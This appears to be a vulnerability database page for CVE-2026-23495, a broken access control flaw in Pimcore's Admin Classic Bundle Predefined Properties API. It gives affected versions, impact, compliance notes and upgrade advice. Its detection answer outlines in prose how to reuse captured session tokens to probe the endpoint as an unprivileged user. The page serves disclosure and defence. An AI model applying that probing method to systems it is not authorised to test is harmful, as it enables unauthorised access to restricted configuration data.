CVE-2026-23495
BaseFortify
Publication date: 2026-01-15
Last updated on: 2026-01-15
Assigner: GitHub, Inc.
Description
Description
CVSS Scores
EPSS Scores
| Probability: | |
| Percentile: |
Meta Information
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| pimcore | admin_ui_classic_bundle | to 1.7.16 (exc) |
| pimcore | admin_ui_classic_bundle | to 2.2.3 (exc) |
| pimcore | pimcore | to 1.7.15 (exc) |
Helpful Resources
Exploitability
| CWE ID | Description |
|---|---|
| CWE-284 | The product does not restrict or incorrectly restricts access to a resource from an unauthorized actor. |
Attack-Flow Graph
AI Powered Q&A
Can you explain this vulnerability to me?
CVE-2026-23495 is a Broken Access Control vulnerability in Pimcore's Admin Classic Bundle. The API endpoint that lists Predefined Propertiesβconfigurable metadata definitions used across documents, assets, and objectsβlacks proper server-side authorization checks. This means that an authenticated backend user without explicit permissions for property management can still access and retrieve the full list of these Predefined Properties. This exposure includes metadata schemas, default values, and configuration details that should be restricted. [1]
How can this vulnerability impact me? :
This vulnerability allows unauthorized backend users to enumerate internal metadata configurations, potentially exposing sensitive business logic, data classification strategies, proprietary keys, or select options. Such exposure can facilitate further attacks like targeted data manipulation or privilege escalation, risking unauthorized changes to asset or object properties. It may also lead to intellectual property leakage and operational inconsistencies within the affected organization. [1]
How does this vulnerability affect compliance with common standards and regulations (like GDPR, HIPAA)?:
The vulnerability poses compliance risks for organizations handling regulated content under standards like GDPR or PCI DSS because unauthorized access to metadata configurations can lead to exposure of sensitive or regulated information. This exposure may result in violations of data protection and privacy requirements, potentially leading to legal and regulatory consequences. [1]
How can this vulnerability be detected on my network or system? Can you suggest some commands?
This vulnerability can be detected by attempting to access the API endpoint responsible for listing Predefined Properties using an authenticated backend user account that lacks explicit permissions for property management. One approach is to log in as an admin to capture the API request for listing Predefined Properties, including authentication tokens such as Cookie and X-Pimcore-Csrf-Token. Then, use these tokens with a backend user without the required permissions to call the same API endpoint. If the user can retrieve the full list of Predefined Properties, the system is vulnerable. Specific commands would involve using tools like curl or Postman to send HTTP requests to the API endpoint with the captured authentication headers to verify unauthorized access. [1]
What immediate steps should I take to mitigate this vulnerability?
The immediate mitigation step is to upgrade the Pimcore admin-ui-classic-bundle to version 2.2.3 or later (for the 2.x branch) or 1.7.16 or later (for the 1.x branch), where the vulnerability has been fixed. The fix involves proper server-side authorization checks on the API endpoint for listing Predefined Properties, ensuring that only users with explicit permissions can access this data. Until the upgrade is applied, restrict backend user permissions to prevent unauthorized users from accessing the vulnerable API endpoint. [1, 2, 3, 4]